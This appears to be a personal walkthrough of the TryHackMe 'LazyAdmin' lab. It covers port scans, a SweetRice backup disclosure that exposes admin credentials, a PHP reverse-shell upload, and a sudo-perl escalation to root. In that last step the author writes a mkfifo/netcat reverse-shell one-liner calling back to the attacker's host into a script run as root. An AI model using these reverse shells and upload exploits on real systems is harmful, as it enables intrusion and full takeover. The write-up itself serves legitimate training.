Date & Time

Jan 27, 2024 2:06 AM

Author

Joseph Jee

TryHackMe | LazyAdmin

Easy linux machine to practice your skills

tryhackme.com

Walkthrough

Gaining a Foothold

Nmap

┌──(kali㉿kali)-[~]
└─$ nmap -sV 10.10.152.201                                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 05:13 EST
Nmap scan report for 10.10.152.201
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.49 seconds

┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -p- 10.10.152.201        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 05:13 EST
Nmap scan report for 10.10.152.201
Host is up (0.27s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1042.09 seconds

Default Web Page

10.10.152.201:80

10.10.151.201/content

SweetRice

10.10.151.201/content

10.10.151.201/content/attachment/

10.10.151.201/content/_themes

10.10.151.201/content/inc

Information Disclosure

Not Found

Apache 2.4.18

SweetRice 1.5.1 - Backup Disclosure Vulnerability

Title: SweetRice 1.5.1 - Backup Disclosure Application: SweetRice Versions Affected: 1.5.1 Vendor URL: http://www.basic-cms.org/ Software URL: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip Discovered by: Ashiyane Digital Security Team Tested on: Windows 10 Bugs: Backup Disclosure

Proof of Concept :

You can access to all mysql backup and download them from this directory. http://localhost/inc/mysql_backup

and can access to website files backup from: http://localhost/SweetRice-transfer.zip

https://vulners.com/zdt/1337DAY-ID-26249

https://www.exploit-db.com/exploits/40718

/content/inc/mysql_backup

LazyAdmin credentials

Lazy Admin

username manager

42f749ade7f9e195bf475f37a44cafcb

Password123

Logged in as manager:Password123

HTTP Enumeration

FFUF

/content

Dirb

┌──(kali㉿kali)-[~]
└─$ dirb http://10.10.152.201     

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jan 13 05:20:39 2024
URL_BASE: http://10.10.152.201/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.152.201/ ----
==> DIRECTORY: http://10.10.152.201/content/                                                                       
+ http://10.10.152.201/index.html (CODE:200|SIZE:11321)                                                            
+ http://10.10.152.201/server-status (CODE:403|SIZE:278)                                                           
                                                                                                                   
---- Entering directory: http://10.10.152.201/content/ ----
==> DIRECTORY: http://10.10.152.201/content/_themes/                                                               
==> DIRECTORY: http://10.10.152.201/content/as/                                                                    
==> DIRECTORY: http://10.10.152.201/content/attachment/

Escalating Privileges

Arbitrary File Upload

https://www.exploit-db.com/exploits/40716

http://10.10.152.201/content/as/?type=media_center&mode=upload/file

Uploaded the reverse shell

Started listener

http://10.10.152.201/content/attachment/r.php5

http://10.10.152.201/content/attachment/ then click r.php5

Gained shell

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.8.252.53] from (UNKNOWN) [10.10.152.201] 47278
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 14:10:41 up  2:06,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
$ cat /home/itguy/backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.252.53 5554 >/tmp/f" > /etc/copy.sh
$ sudo perl /home/itguy/backup.pl
rm: cannot remove '/tmp/f': No such file or directory

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 5554                
listening on [any] 5554 ...
connect to [10.8.252.53] from (UNKNOWN) [10.10.152.201] 52026
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

The mkfifo() function shall create a new FIFO special file named by the pathname pointed to by path.

A FIFO special file sends data from one process to another so that the receiving process reads the data first-in-first-out (FIFO).

LazyAdmin

TryHackMe | LazyAdmin

Walkthrough

Gaining a Foothold

Escalating Privileges

Video